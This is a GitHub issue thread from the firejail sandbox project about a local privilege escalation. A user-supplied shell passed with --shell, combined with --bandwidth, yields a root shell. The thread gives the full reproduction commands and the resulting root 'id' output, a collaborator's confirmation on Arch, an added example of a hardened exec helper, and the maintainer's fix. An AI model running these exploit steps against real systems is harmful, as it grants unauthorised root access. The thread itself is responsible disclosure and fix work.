Root shell via --bandwidth and --shell #1023

Closed
mcarpenter opened this issue Jan 6, 2017 · 2 comments
@mcarpenter
Contributor

[Against current HEAD, commit 64355]

In a first window run:

$ firejail --noprofile --name=x --net=eth0

In a second window, firstly create a dumb shell that ignores -c:

$ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell -

and then secondly invoke that shell via the --shell and --bandwidth flags to obtain root:

$ firejail --shell=./dumbshell --bandwidth=x status
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),125(vboxusers),2000(wiki),10000(martin) context=system_u:system_r:initrc_t:s0

Error occurs at

char *arg[4];
arg[0] = cfg.shell;
arg[1] = "-c";
arg[2] = cmd;
arg[3] = NULL;
clearenv();
execvp(arg[0], arg);

I don't see any good reason to permit a user-specified shell to run a bandwidth command.
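The following is an added example, not code from firejail or from the fix referenced in this thread. It shows one way to run a helper command from privileged code without consulting the user-selected shell; the `cfg` struct, `HELPER_SHELL` and `run_privileged_cmd` are hypothetical stand-ins, and `/bin/sh` is assumed to be a root-owned shell that honours `-c`.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-in for the config struct in the snippet above; only .shell is modelled. */
static struct { const char *shell; } cfg = { "./dumbshell" };

/* Assumption: /bin/sh is a root-owned shell that honours -c. */
#define HELPER_SHELL "/bin/sh"

/* Run cmd while still privileged. cfg.shell is deliberately not consulted:
 * the interpreter is a compile-time absolute path, executed with execve()
 * (no PATH search) and an empty environment, which has the same effect as
 * clearenv() followed by exec. Returns the exit status, or -1 on error. */
int run_privileged_cmd(const char *cmd) {
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *arg[4];
        char *envp[] = { NULL };
        arg[0] = HELPER_SHELL;
        arg[1] = "-c";
        arg[2] = (char *)cmd;
        arg[3] = NULL;
        execve(HELPER_SHELL, arg, envp);
        _exit(127); /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void) {
    /* Constructed input: the user asked for ./dumbshell, the helper ignores it. */
    printf("cfg.shell=%s helper=%s status=%d\n", cfg.shell, HELPER_SHELL,
           run_privileged_cmd("exit 7"));
    return 0;
}
```

If a user-chosen program ever has to be executed, the usual counterpart is to drop to the real UID and GID permanently before the exec.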

@Fred-Barclay
Collaborator

Fred-Barclay commented Jan 7, 2017

I can confirm this is "working" in Arch with firejail built from latest source. 😦
$ firejail --noprofile --name=x --net=enp6s0

$ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell -
<stdin>: In function ‘main’:
<stdin>:1:13: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
$ firejail --shell=./dumbshell --bandwidth=x status
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(fred)
sh-4.4# ls /root
Desktop
sh-4.4# whoami
root
sh-4.4# touch /root/bad_dir
sh-4.4# ls /root
Desktop  bad_dir
sh-4.4# 

EDIT: --noprofile isn't actually needed. $ firejail --name=x --net=enp6s0 works just as well.
EDIT:

@netblue30
Owner

netblue30 commented Jan 7, 2017

This one was quite stupid, thanks for finding it!

Fix on mainline: 5d43fdc

Pushed also a fix on 0.9.44-bugfix branch. Interesting, we don't have this on 0.9.38-LTS branch.
